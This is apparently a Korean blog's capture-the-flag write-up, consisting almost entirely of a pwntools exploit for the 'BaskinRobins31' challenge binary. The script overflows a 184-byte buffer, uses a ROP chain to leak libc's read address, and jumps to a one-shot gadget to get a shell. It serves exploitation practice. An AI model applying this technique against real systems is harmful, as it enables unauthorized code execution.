티스토리 뷰
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 | from pwn import * p = process('./BaskinRobins31') e = ELF('./BaskinRobins31') context(arch='amd64',os='linux',endian='little',log_level='debug') POP_RDI_RSI_RDX_RET = 0x0040087a main = 0x400a4b payload="A"*184 payload+=p64(POP_RDI_RSI_RDX_RET) payload+=p64(1) payload+=p64(e.got['read']) payload+=p64(8) payload+=p64(e.plt['write']) payload+=p64(main) p.send(payload) #print p.recvuntil("Don't break the rules...:(") p.recvuntil(":( \n") read = u64(p.recv(6)+"\x00"*2) log.success("read leaked : "+hex(read)) libc_base = read - 0xf7250 # in local oneshot = libc_base + 0xf1147 # in local payload1="A"*184 payload1+=p64(oneshot) p.sendline(payload1) p.interactive() | cs |
'Pwnable > write up' 카테고리의 다른 글
[Sunrin Internel CTF] cee (0) | 2018.09.16 |
---|---|
[PlaidCTF 2013] ropasaurusrex (0) | 2018.09.16 |
[HITCON 2017] start (0) | 2018.09.14 |
[Defcon 2016]feedme (0) | 2018.08.27 |
[TAMU ctf 2018] pwn4 (0) | 2018.05.17 |
댓글